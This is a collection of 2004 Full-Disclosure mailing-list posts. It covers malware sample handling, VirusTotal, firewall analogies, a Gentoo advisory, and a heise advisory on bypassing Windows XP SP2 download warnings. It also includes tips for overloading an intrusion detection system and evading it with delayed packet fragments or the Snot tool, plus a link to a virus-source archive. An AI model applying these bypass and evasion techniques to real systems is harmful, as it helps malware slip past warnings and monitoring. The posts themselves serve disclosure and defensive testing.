Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFBOGf+zKC5hMHO6rkRAs+8AJ9iqIQJ1+lbPhDobuLGueJrF0OGYwCfTiN+ diMCKpuf1Ld5GyfdwUkHUJE= =WGtM -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] win2kup2date.exe ?
On Fri, 3 Sep 2004 04:05:02 -0700 (PDT), Harlan Carvey <[EMAIL PROTECTED]> wrote: > James, > > I'm replying off-list for the simple fact that I can't > believe the post you sent to FD. Your questions back > to Nick are...well, what's the right word???...it's as > if you're not even paying attention. Apologies I will try to explain myself. I am sending this back to the list, as it is obvious that my meaning was not clear, and there may be some points to be learned by others also. Thank you for pointing this out to me. > > > > ... If you want to email me a copy of it, I'll > > > > rip it apart and see what can be seen. > > > > > > And world plus dog should entrust you with such > > material because??? > > ... most viruses, trojans and malware to not store > > copies of stolen > > data in their executables. Furthermore the file size > > is very small. > > Interesting answer, but completely non-sequitor. Nick > asked why this person should be trusted with a live > bit of malware, and your response is that it's not > very big??? What does that have to do with anything? Malware and viruses are VERY readily available in many places accross the internet. Therefore this point should be of no concern. The only other concern which may be important is the possibility that the binary is carrying data from the infected system; it was this that I was refering to. Please accept my apology for not making this clearer. > > > P.S. Send it to [...] - it's my "catch all" for > > > > virus/unknown files. Just be sure to ZIP it up > > or else the web host > > > > won't let it through. Otherwise I have disabled > > all checks/scan. > > > > Downloads directly to a secured Linux box. > > > > > > That's all very nice, but alone, far from the > > makings of someone to > > > entrust arbitrary, suspected malware samples to. > > > > "Entrust", just what exactly are you thinking you > > might be giving away? > > Well, it's pretty obvious...a live bit of malware. > It's really pretty obvious what Nick's getting > at...why send this malware to some arbitrary person? > Who's to say that he's going to use it as he says, and > not send it back out to someone else? To what end? It would be much more useful to an attacker to go and collect and customise one of the many readily available trojans on the internet, rather than spreading malware which they have no control over. IMHO your concern is closer to cynicism than practical reality. > > Again, you suspect allot of deception here, and > > while it is of course > > possible you are correct, I have yet to see this > > ever done in practice. > > You haven't seen deception in practice...in general, > or specifically in the case of VirusTotal? If the virus was carrying data from the local system, and some hackers had set up a fake site of the VirusTotal sort, this would be a sophisticated way of decieving "security pros" into passing out details. It would be easily possible to carry all of their password hashes, for example, if any of them run VPNs this would be a near instant release of access passwords (an army of several hundred zombies could decode all the LM hashes in minutes). > > Samples of non-data carrying viruses or > > trojans are of > > little use to anyone other than Anti-Virus firms, as > > it is easy to > > collect raw source for most if one is so inclined. > > Really? Are you able to do so? I would submit that > many with malicious intent don't know the sites and > sources you seem to be aware of, and will actually ask > for the binary...for the purpose of releasing it > against someone else. Non-data carrying or otherwise, > it doesn't matter. I received several IMs just this > weekend in which I was asked for running viruses. Well, the same lack of trust may be given to you. In order find a balence between proving my point and not providing you with up to date info, I will provide you with this (http://vx.netlux.org/) site as an example, which is not carrying any modern sources at this time. You can find these easily by trawling security sites of high standards, they have outbound links to such sites. Google is rarely your freind in this regard, which may be why you are not aware of the high numeracy of such sites on the internet. Needless to say that this lack of awareness is possibly a good thing for most people (read: reduces script-kiddie access to such data). > > I agree that it is unlikely they have sufficient > > client licenses to > > provide such a service; however I can see that there > > are a great deal > > of arguments in law about how their case may be won. > > If a product is used in a manner for which it is not > sufficiently or correctly licensed, how can one then > use the law to win their case? After all, it wouldn't > be "their" (ie, VirusTotal's) case...it would be a > case brought against them by the vendor. I am not a lawyer, but I have seen cases won due to lack of definition of a license. In this case the argument I gave
Re: [Full-Disclosure] Re: Empirical data surrounding guards and firewalls.
Yes, I realised that last night. It is interesting, but I think in his attempt to disproove the anology, he came up with a very comparable one. The firewall at McDonalds.com seems to filter all data to all ports other than port 80. You cant enter a McDonalds resteraunt through anything but the door. The firewall is not content filtering, thus does not stop bad requests passign through it. The door does not stop people for incorrect attire. The webserver returned a 404 error when a request was made for something which did not exist there. It is now at this point we start to see this anology fall down, but that is because the two situations are in fact different. Technically, you could argue that the poor attire was in breach of protocol. This would prompt a different response than the equivalent supplied here in the example of the virtual world. More accurately, the packet (Evol) was should not have been in breach of protocol, as his virtual packet never was. In fact he should have requested something that was not on the menu. The response would have been very much like Error 404 Item On Menu Not Found. Of course anaolgies fall down when they are not actually built to be the same thing. Without adding more kindling to the fire, this is possibly one of the better analogies I have seen for a simple allowed connection to a webserver. Now the problem with explanding an anaolgy is that it is hard to find appropriate comparative things. Lets use an example of one of the old IIS exploits. The erronous data for many of the old IIS exploits is actually a breach of the HTTP protocol. Some firewalls can use content filtering against this, this would be comparable to a "detector" on the door looking for a person (packet) carrying an illegal object (an illegally formed request). If the firewall is not content filtering the data reaches the webserver, and the webserver DoSes when the data is read. Well, this is hard to equate; its like the person walking up to the attendant and shouting at them in a forreign language, with sufficient intensity to knock them unconcious. Unconcious is difficult still, as neural nets (brains) are very good at recovering from this kind of problem, whereas computers end up in infinate loops with equal ease. It is likely that abstraction is a better way of teaching this kind of thing. You need to teach at one level in the stack at a time. The other levels could be thought of as having interfaces, and you can maybe describe some functionality of the interface in a less than fully accurate way. But... It's a bit like trying to teach RF to an IP guy though, much of the time they just dont get it. Anyway, I think Frank has some very well written arguments on this problem, I don't feel we are going to be able to develop much more useful from the discussion until a good idea for a solution to the lack of time vs. not using anolgies problem is found. Who ever said teaching was easy? EOF, EOT, EOD. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Security & Obscurity: physical-world analogies
On Fri, 3 Sep 2004 02:04:08 -0600, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: [...] > > No, CEOs et al do not have an hour to spend reading full-disclosure > everyday. But in today's world it is imperative that they have someone > on staff who does. And they listen to that person. Equipped with good > thought tools to consider what this person says will enable them to make > the right decisions regarding the security and integrity of their > organization. > This sums up exactly what is required. While this thread has been informative, the above paragraph is all that is required by the CEO's to be read. Peter Swire should copy it and publish it as 4 years of work - nothing more needs to be said and I bet most CEO's will even read it as its only a paragraph long :] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] The Hacker's Manifesto Reloaded
The following was written shortly after my placement... \/\The Conscience of a Hacker - Redux /\/ (c)CopyRight SuppaDuppaSecurity Solutions. *where do u wanna pee today* by +++The Entrepreneur+++ Written on September 3, 2004. Another one got bought today, it's all over the Wall Street. "Teenager Floated A Big Secuirty Company ", "Hacker Paid After Ethical Hacking Of A Bank..." Damn kids. They're all money whores. But did you, in your C Grade Economics Degree and l4am3 technobrain, ever take a look behind the eyes of this professional hacker? Did you ever wonder what made him whored, what forces lured him, what may have sold him? I am a professional hacker, look at my bank account... Mine is a world that begins with money... I'm richer than most of the other kids, this crap they buy is so darn cheap... Damn underachiever. They're all money whores. I'm a junior security consultant. I've listened to senior security professionals about how to be a good hacker. I spit at it. "No, Mr.NiceGuy-CISSP CISA CEH, I didn't show my 0day. I sold it..." Damn kid. Probably leeched it. They're all money whores. I made a discovery today. I found a Venture Capitalist. Wait a second, this is cool. It does what I want it to. If it makes a mistake, he doesnt notice because, he is lame. He doesn't understand a crap of security, but he is blinded by that greenish tinge of money. He says it's the real thing, biotech was a fluke. I do BlaBlaBla and he is cashing in on it. Damn kid. All he does is techno babble. They're all money whores. And then it happened... a door opened to a world... rushing through the phone line like money through ATM wires, an electronic account transfer is done, a refuge from the day-to-day incompetencies is sought... I sold the code. "This is it... this is where I belong..." I can buy everyone here... even if I've never met them, never talked to them, may never hear from them again... I can buy you all... Damn professional hacker. Tying up the server again with his DDos bots. They're all money whores... You bet your ESOPs we're all alike... we've been spoon-fed security certifications when we hungered for real stuff ... the bits of meat that you gave was old seminar crap, for which you charged $500. We've been dominated by, or taken over by these so called security gurus. The few that had something to teach found us willing pupils, but those poor few are like money in their accounts. This is our world now... the world of the security and hoopla, the beauty of the moolah. We make use of a service already existing without licensing for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us money whores. We sell what you already sold.. and you call us money whores. Yes, I am a professional hacker. My crime is that of greed. My crime is that of cashing in on this security hype. My crime is that of outsourcing you, something that you will never re-pay me for. I am a professional hacker, and this is my manifesto*[(c) Please read EULA for further details]. You may stop this individual, but you can't stop us all ... after all, we're all are money whores. +++The Entrepreneur+++ ___ Do you Yahoo!? Win 1 of 4,000 free domain names from Yahoo! Enter now. http://promotions.yahoo.com/goldrush ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [RE: Test scripts for NIDS]
> > I've gotten alot of suggestions to test the > > signatures, i've got some to test the load but they > > were $$$, anything out there for free ? > > > > With a software and not an appliance how does one test > > the load to know when the IDS can no longer verify > > packets and they are being dropped ? Is this included > > in the software ? > > You can send random data with tools like iperf or tftp. and at the mean time send some data through netcat. Depending on the preprocessor config (with snort), you will notice the NIDS will start to drop packets. The same is possible with fragmented packets(hping2): Send first fragment, wait some time (e.g. 45 seconds) and send the second fragment. greets, Thomas ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)
On Thu, Sep 02, 2004 at 04:01:16PM -0400, Über GuidoZ wrote: > It's kind of interesting to see the results, as it shows you what AV > programs seem to detect things better then others. I think this is actually misleading. You know nearly nothing from scanning just a single (or 10, 50,...) sample. And there are other basic test requirements. For example: - the different results could be due to differences in the update schedule at virustotal.com (some vendors offer their fastest updates only for premium licenses, which virustotal may not have). - maybe some products are used with optimized settings (for example maximum heuristic detection) and others with default settings. > It's also useful > for known viruses, but needing to know what each AV program calls > them. (I find this useful when trying to do tech support.) You know Vgrep (http://www.virusbtn.com/resources/vgrep/index.xml) ? -- Michel Messerschmidt [EMAIL PROTECTED] antiVirusTestCenter, Computer Science, University of Hamburg ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Flaws in the new security functions of SP2 - revisited
A couple of days I posted an advisory about flaws in a new security functions of Service Pack 2 (for details, see: http://www.heise.de/security/artikel/50051). Now I would like to share some additional information which has been found out in conjunction with Sven Ritter, a German developer. 1) The Windows Explorer caching issue We gave a second look at the issue reported previously that Windows Explorer under certain conditions launches files using outdated Zone ID information from a system cache. Further inspection reveals that this does not only affect Explorer but any software which launches applications or scripts using the ShellExecuteEx function supplied by Windows. The Internet Security Manager is in charge of determining the zone of a file (CLSID_InternetSecurityManager). This object contains a cache (CSecurityManager::CSecMgrCache) which stores zones which have been determined previously. When the function is called again, the method CSecurityManager::MapUrlToZoneInternal will first check whether there is a cached request for the corresponding file or URL. If there is cached information, the method will return the previously determined zone -- even if the file's Zone ID has changed in the meantime. Since the Internet Security Manager is loaded as a COM object into the current process, the cache is local to that process. This explains why the problem can be "alleviated" by restarting Windows Explorer. It appears that the cache size is limited to four entries. If four files with different names are launched after the start of application XY, the function will recognize the changed Zone ID of application XY. 2) Other Execution Paths The previous advisory showed how cmd.exe completely ignores Zone IDs. Further tests revealed other execution paths which circumvent checks contained in SP2. Refresher: When downloading files through Internet Explorer and Windows Messenger or saving attachments transferred Outlook Express, the file is given a Zone ID saved in an Alternative Data Stream. When a downloaded application or script is launched, Windows displays a security warning which alerts the user to the fact that this file has been downloaded from the Internet and that it could be dangerous. If you extract files from a ZIP archive which has been downloaded from the Internet using XP's built-in ZIP Wizard (using File/Extract all), SP2 sets the Zone ID for the extracted files. However, if the ZIP archive is opened with a double-click and an executable file is extracted by Drag & Drop to the desktop or using Copy & Paste, no Zone ID is set. Additionally Zone IDs are not set on files marked as Read-only -- even when using the Wizard. If the downloaded archive evil.zip contains evil1.exe (attrib -R) and evil2.exe (attrib +R) and you extract them with the Wizard into the folder evil, opening evil1 gives you a warning, opening evil2 not. bye, ju -- Juergen SchmidtChefredakteur heise Security www.heisec.de Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover Tel. +49 511 5352 300 FAX +49 511 5352 417EMail [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)
On Fri, Sep 03, 2004 at 10:43:50AM +0530, Aditya Deshmukh wrote: > hey if the binary is infected and does not contain any hardcoded > sencitive info what do u care about the owners of the website ? Unless for (a purely theretical) example the website would use your submission to infect others (perhaps with your address as sender) :-) Although the binary may not contain any sensitive data, it is dangerous in itself because it is self-replicating and thus hard to control once it is activated. If your are not very cautious when handling self-replicating code, you most likely end up sending it out to the world. So for the question how to handle possibly dangerous code it all comes down to "Who do you trust" ? -- Michel Messerschmidt [EMAIL PROTECTED] antiVirusTestCenter, Computer Science, University of Hamburg ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] UPDATE: [ GLSA 200408-22 ] Mozilla, Firefox, Thunderbird, Galeon, Epiphany: New releases fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200408-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mozilla, Firefox, Thunderbird, Galeon, Epiphany: New releases fix vulnerabilities Date: August 23, 2004 Bugs: #57380, #59419 ID: 200408-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis New releases of Mozilla, Epiphany, Galeon, Mozilla Thunderbird, and Mozilla Firefox fix several vulnerabilities, including remote DoS and buffer overflows. Background == Mozilla is a popular web browser that includes a mail and newsreader. Galeon and Epiphany are both web browsers that use gecko, the Mozilla rendering engine. Mozilla Firefox is the next-generation browser from the Mozilla project that incorporates advanced features that are yet to be incorporated into Mozilla. Mozilla Thunderbird is the next-generation mail client from the Mozilla project. Affected packages = --- Package / Vulnerable /Unaffected --- 1 mozilla< 1.7.2 >= 1.7.2 2 mozilla-firefox< 0.9.3 >= 0.9.3 3 mozilla-thunderbird< 0.7.3 >= 0.7.3 4 mozilla-bin< 1.7.2 >= 1.7.2 5 mozilla-firefox-bin< 0.9.3 >= 0.9.3 6 mozilla-thunderbird-bin< 0.7.3 >= 0.7.3 7 epiphany < 1.2.7-r1 >= 1.2.7-r1 8 galeon< 1.3.17 >= 1.3.17 --- 8 affected packages on all of their supported architectures. --- Description === Mozilla, Galeon, Epiphany, Mozilla Firefox and Mozilla Thunderbird contain the following vulnerabilities: * All Mozilla tools use libpng for graphics. This library contains a buffer overflow which may lead to arbitrary code execution. * If a user imports a forged Certificate Authority (CA) certificate, it may overwrite and corrupt the valid CA already installed on the machine. Mozilla, Mozilla Firefox, and other gecko-based browsers also contain a bug in their caching which may allow the SSL icon to remain visible, even when the site in question is an insecure site. Impact == Users of Mozilla, Mozilla Firefox, and other gecko-based browsers are susceptible to SSL certificate spoofing, a Denial of Service against legitimate SSL sites, crashes, and arbitrary code execution. Users of Mozilla Thunderbird are susceptible to crashes and arbitrary code execution via malicious e-mails. Workaround == There is no known workaround for most of these vulnerabilities. All users are advised to upgrade to the latest available version. Resolution == All users should upgrade to the latest stable version: # emerge sync # emerge -pv your-version # emerge your-version References == [ 1 ] CAN-2004-0763 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0763 [ 2 ] CAN-2004-0758 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0758 [ 3 ] CAN-2004-0597 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597 [ 4 ] CAN-2004-0598 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598 [ 5 ] CAN-2004-0599 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200408-22.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFBODukzKC5hMHO6rkRAhL8AJ4/Sv7xDRUIUyb/vJWqoAJK0Ft2QQCdHo3z ybxN9FXECqEJjWceB6uLR9M= =YKBA -END PGP SIGNATURE- _
[Full-Disclosure] Re: Empirical data surrounding guards and firewalls.
On Thu, Sep 02, 2004 at 11:15:04PM +0100, James Tucker ([EMAIL PROTECTED]) wrote: > Apologies, please explain the lack of differences, I'm not getting them. > > Virtual: > "The door" - Port 80 - Closed after connection attempt. You come back, > it does the same, and then closes again. 404 Error not being > dissimilar to being told to get out. His request was passed by the firewall. It was the web server that would not sell him a Big Mac because he did not have a shirt and shoes on. -- Chief Gadgeteer Elegant Innovations ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Security & Obscurity: physical-world analogies
On Thu, Sep 02, 2004 at 05:37:20PM -0500, Frank Knobbe ([EMAIL PROTECTED]) wrote: > To really illustrate the point, let me make a more colorful example. > People-packets in the real world can be stopped by a moat around the > castle. The people-packet runs towards the castle and falls into the > moat. People-packet has ceased to exist. In cyber space, the > people-packet will again clone itself and run "purposefully" into the > moat, piling up the "dead" people-packets until the moat is full. The > remaining people-packets can then enter the castle. > > Feel free to play through the same scenario with a wall where "dead" > people-packets get purposefully deployed in front of the wall until the > last people-packet can climb the packet mountain and pass over the wall. Unfortunately, this tactic has been used in warfare. It has been referred to as the "human wave" attack. :-( > The copy conundrum: You have a chair. Dave wants to steal your chair. If > he does, you know your chair has been stolen. In cyber space, Dave can > steal your chair by making a copy. You still have your chair and you do > not know if it was stolen or not. Dave does have your chair now, but you > don't know. > > Leftovers: Let's say you burned said chair. Let's say Dave told you that > he came to your house, made a copy of your chair, drove home and put the > copy into his living room. In the real world you might go to Dave's > house and remove/destroy your chair. In the IT world you will find that > said chair is not only present in Dave's living room, but there is an > inadvertent copy left in his car. Oh, and also on his hands, or any > other place that the chair passed through. This is a good example and Dave's mention of the multi-packet attack is another of why there are large gaps created when relying too heavily on analogies from one realm in another. I understand your need for analogies to communicate ideas to a non-technical audience. Use analogies and case studies that do not invoke such powerful emotions. These simply cloud the issue and lead to thinking errors. Exploiting thinking errors is highly effective in both the physical world and the binary world. There are thought experiments that can lead to clear thinking about the issues at hand. For example, chaper 21 of Bruce Schneier's Secrets & Lies where he describes "attack trees". Ross Anderson uses the thought experiment "how to steal a painting" in his analysis of threat models in "Security Engineering: A Guide to Building Dependable Distributed Systems". No, CEOs et al do not have an hour to spend reading full-disclosure everyday. But in today's world it is imperative that they have someone on staff who does. And they listen to that person. Equipped with good thought tools to consider what this person says will enable them to make the right decisions regarding the security and integrity of their organization. -- Chief Gadgeteer Elegant Innovations ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [RE: Test scripts for NIDS]
For to test with stick and snot you just throw alerts at the IDS, after that, you should check the logs of the IDS to see what has been recorded and what dropped. You also can throw (with stick and snot) and try to exploit the IDS from another machine in the same time. Have also a look at http://packetstormsecurity.nl/distributed/stick.htm Stick Download: http://www.eurocompton.net/stick/projects8.html Snot Download: http://www.stolenshoes.net/sniph/index.html IDSwakeup Download: http://www.hsc.fr/ressources/outils/idswakeup/index.html.en GreetZ from IndianZ mailto:[EMAIL PROTECTED] http://www.indianz.ch > I've gotten alot of suggestions to test the > signatures, i've got some to test the load but they > were $$$, anything out there for free ? > > With a software and not an appliance how does one test > the load to know when the IDS can no longer verify > packets and they are being dropped ? Is this included > in the software ? > > Thanks again everyone :) > > >> > -Original Message- >> > From: Bénoni MARTIN >> [mailto:[EMAIL PROTECTED] >> > Sent: August 31, 2004 09:05 >> > To: John Madden; [EMAIL PROTECTED] >> > Subject: RE: Test scripts for NIDS >> > >> >> > >> > I know there is a tool that generates Snort's >> alerts, but I >> > just cannot remeber it's name :( >> > >> The tool you're talking about is called "SNOT". You >> can find it >> here: http://www.stolenshoes.net/sniph/index.html >> >> From the file 'snot-0.92a-README.txt' post at that >> URL: >> >> "Snot is an arbitrary packet generator, that uses >> snort rules >> files as its source of packet information. It >> attempts at all >> times to randomise information that is not contained >> in the >> rule, to hamper the generation of 'snot detection' >> snort rules. >> >> It can be used as an IDS evasion tool, by using >> specific decoy >> hosts, or just something to keep your friendly IDS >> monitoring >> staff busy. >> >> It has been tested to run on *BSD, Linux, Win2k, >> NT4.0 and Win98." >> >> I hope this helps, >> Alex% ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Response to comments on Security and Obscurity
Personally, I feel it's a VERY valid point. If the only way to fix something, for example, is by training and education, it's entirely possible the time (and resources) necessary to do such a thing isn't there. [EMAIL PROTECTED] said: > If you do not have time, and the audience does not care > enough to spend the time, then the battle is already lost. I believe this is entirely two different things (you do not have the time and the audience doesn't care), and usually they don't exist at once in a given situation. (It's one or the other.) However, I will agree that the battle will be lost if no one cares or tries to do anything in a given situation. James Tucker said: > I apologise, but I have spent most of my life at this and I don't know > everything, I doubt my audience would donate that much time, even > if I gave it. Agreed. I've been down the same path and have met with resistence when I tried to provide the time and resources necessary to solve a given problem. More often then not I find it's the "audience" that is unwilling. They don't want to take the time to learn something new, train their staff something new, or provide the money to do all, or any of, the above. Pity. -- Peace. ~G On Thu, 2 Sep 2004 22:42:27 +0100, James Tucker <[EMAIL PROTECTED]> wrote: > On Thu, 2 Sep 2004 12:53:20 -0700 (PDT), Security List > <[EMAIL PROTECTED]> wrote: > > Mr. Tucker wrote: > > > > >Maybe, but you have to educate people somehow, and > > you don't have time > > >to explain everything. > > > > This is an excuse and the weak point. If you do not > > have time, and the audience does not care enough to > > spend the time, then the battle is already lost. > > I apologise, but I have spent most of my life at this and I don't know > everything, I doubt my audience would donate that much time, even if I > gave it. But thank you for your encouragement. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] win2kup2date.exe ?
Hey, the man asked for help, so I offered it. Simple as that... I'm a helpful guy, it's what makes me tick. Dedicated my life to a non-profit organization that helps the average consumer FOR FREE with security consulting, technical support, and personal privacy. Not because I'm trying to collect anything. Not because I'm trying to get a foothold on any business. Simply for the fact that I remember how frustrated and helpless I was when I didn't understand anything. I try to make sure others don't have to suffer the same fate. Be cautios with your words. You never know who you may be speaking to, or how they will take it. General advise; not necessarily relating to this situation beyond common courtesy. As for VirusTotal.com, to be honest I have never cared why they provide the service they do. I also could care less if they are keeping copies of the viruses that are sent to them... they are available all over the Internet. (Google it...) When someone has an unknown malware EXE and they need a quick way to identify it to fix a problem, why not go with what works? Their business practices isn't any business of mine. The fact that they answer the question I ask, however, IS. A little respect is all I ever ask. =) -- Peace. ~G On Fri, 03 Sep 2004 11:19:41 +1200, Nick FitzGerald <[EMAIL PROTECTED]> wrote: > Über GuidoZ wrote: > > > ... If you want to email me a copy of it, I'll > > rip it apart and see what can be seen. > > And world plus dog should entrust you with such material because??? > > > P.S. Send it to [...] - it's my "catch all" for > > virus/unknown files. Just be sure to ZIP it up or else the web host > > won't let it through. Otherwise I have disabled all checks/scan. > > Downloads directly to a secured Linux box. > > That's all very nice, but alone, far from the makings of someone to > entrust arbitrary, suspected malware samples to. > > I'm also rather suspicious of your promotion of Virus Total. Hispasec, > as far as I can tell (Spanish being something I have to have translated > via online services), has no antivirus or similar product of its own, > yet it has set up, and some folk seem to be promoting, what is > effectively a sample collection mechanism. I've also heard vague > rumblings that Hispasec/Virus Total does not have suitable licenses for > at least some of the scanners used in its service (and strongly suspect > that several of the AV vendors whose products are currently used would > not allow their products to be licensed for use in a service of the > kind Virus Total offers anyway because it paints a rather disturbing > trust picture -- "You can trust me because I can run a virus > scanner..."). > > Regards, > > Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)
Awesome list of info there Nick. Thanks for putting it all into one place. =) -- Peace. ~G On Fri, 03 Sep 2004 11:19:41 +1200, Nick FitzGerald <[EMAIL PROTECTED]> wrote: > bashis wrote: > > > Thx for the tip with VirusTotal guys! =) > > > > Here is the result. > <> > > OK -- having delayed it this far, have you considered sending a copy to > the major AV vendors so they can add detection of it to their products > (and, in the case of those that already detect it heuristically or > generically, ensure that they don't "lose" detection of this possibly- > unseen-by-them variant when their heuristic/generic detectors get > revised/updated, as they are all the time)? > > Here's a list of the sample submission address of the developers of the > better known virus scanners: > >Authentium (Command Antivirus) <[EMAIL PROTECTED]> >Computer Associates (US)<[EMAIL PROTECTED]> >Computer Associates (Vet/EZ)<[EMAIL PROTECTED]> >DialogueScience (Dr. Web) <[EMAIL PROTECTED]> >Eset (NOD32)<[EMAIL PROTECTED]> >F-Secure Corp. <[EMAIL PROTECTED]> >Frisk Software (F-PROT) <[EMAIL PROTECTED]> >Grisoft (AVG) <[EMAIL PROTECTED]> >H+BEDV (AntiVir, Vexira engine) <[EMAIL PROTECTED]> >Kaspersky Labs <[EMAIL PROTECTED]> >Network Associates (McAfee) <[EMAIL PROTECTED]> > (use a ZIP file with the password 'infected' without the quotes) >Norman (NVC)<[EMAIL PROTECTED]> >Panda Software <[EMAIL PROTECTED]> >Sophos Plc. <[EMAIL PROTECTED]> >Symantec (Norton) <[EMAIL PROTECTED]> >Trend Micro (PC-cillin) <[EMAIL PROTECTED]> > (Trend may only accept files from users of its products) > > -- > Nick FitzGerald > Computer Virus Consulting Ltd. > Ph/FAX: +64 3 3529854 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Microsoft Update Loader msrtwd.exe
Easy sparky. Maybe it isn't his choice that he cannot release the EXE. It's entirely possible, in fact, quite likely, that some "higher up" who knows dick about IT and viruses got scared and said "This cannot be shared with anyone! If it doesm you'll lose your job". Just because they are worried about their image or that the file might contain sensitive data. I have run into this situation MANY times. There is usually little you can do about it as an IT staff member or a consultant. So the next best thing - ask a group of people that might have a clue what's going on, WITHOUT needing to see or analyze said file. Sheesh, give the guy a break. The only pollution I've noticed lately is rude comments. -- Peace. ~G On Thu, 2 Sep 2004 20:30:53 +0200 (CEST), Feher Tamas <[EMAIL PROTECTED]> wrote: > Hello, > > >Recently discovered a trojan(? - possibly a virus) called > >msrtwd.exe. It's listed in the Registry as "Microsoft Update > >Loader" Does anyone know anything about this? > >(Un)Fortunately, I am not allowed to distribue the exe. > > When the f*ck will people finally realize that it is NOT possible to say > anything about a file without actually having the file? > > If you wanna know what the f*ck this or that file is, go to and feed that > file here: > http://www.kaspersky.com/scanforvirus > > Less than 50 chars to remember and you can stop polluting this list. > Wow! > > Regards: Tamas Feher. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Viral infection via Serial Cable
I understadn where you're coming from if speaking about protocol. However, in most cases there will be many more ways to exploit something over TCP/IP then over a raw RS232 connection. The serial port will need to have something listening on it, that is also exploitable. Compare this to the amount of exploitable services and such listening on a TCP/IP connection over the network. Matter of propability is what I was getting at... I apologize if I wasn't clear on this point. Accepting the fact that MANY viruses exist in the wild that are designed to infect over TCP/IP, the chance of running into one that infects over a serial port is little to none. (Granted, unless that connection is being used as a network comunication device, which then in turns changes the entire argument back over to TCP/IP and network, not RS232 data.) Interesting thoughts all, please keep them coming. -- Peace. ~G On Tue, 31 Aug 2004 02:49:41 +0200, Christian <[EMAIL PROTECTED]> wrote: > Über GuidoZ wrote: > > even though it's officially a serial connection... the assumtion is > > talking about RS232 specs: http://www.google.com/search?q=rs232 I > > think we're all aware a virus can most certainly traverse through a > > USB connection.) > > > > hm, i fail to see the point here. isn't a serial connection to the > outside world "just another link"? who cares, if it is a serial > connection or ethernet? maybe i am biased with SLIP under linux - Serial > Line IP, so the serial device really gets an ip-address and then it's > tcp/ip all the way and no application/virus would care if this is > "serial link". or is all data just sent to "com1"? > > thanks, > Christian. > -- > BOFH excuse #416: > > We're out of slots on the server ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] win2kup2date.exe ?
James Tucker said: > There is always no need for aggressive statement of suspicion, which > you are close to here. While I understand aggression due to anger, I > am concerned that one should not get angry at someone offering them > a service merely because one is suspicious of them. What if the offer > of help is entirely genuine? Amen. Not only that, but was also said, the choice to do so or not is yours. -- Peace. ~G On Fri, 3 Sep 2004 02:19:07 +0100, James Tucker <[EMAIL PROTECTED]> wrote: > On Fri, 03 Sep 2004 11:19:41 +1200, Nick FitzGerald > <[EMAIL PROTECTED]> wrote: > > Über GuidoZ wrote: > > > > > ... If you want to email me a copy of it, I'll > > > rip it apart and see what can be seen. > > > > And world plus dog should entrust you with such material because??? > ... most viruses, trojans and malware to not store copies of stolen > data in their executables. Furthermore the file size is very small. > > > > P.S. Send it to [...] - it's my "catch all" for > > > virus/unknown files. Just be sure to ZIP it up or else the web host > > > won't let it through. Otherwise I have disabled all checks/scan. > > > Downloads directly to a secured Linux box. > > > > That's all very nice, but alone, far from the makings of someone to > > entrust arbitrary, suspected malware samples to. > > 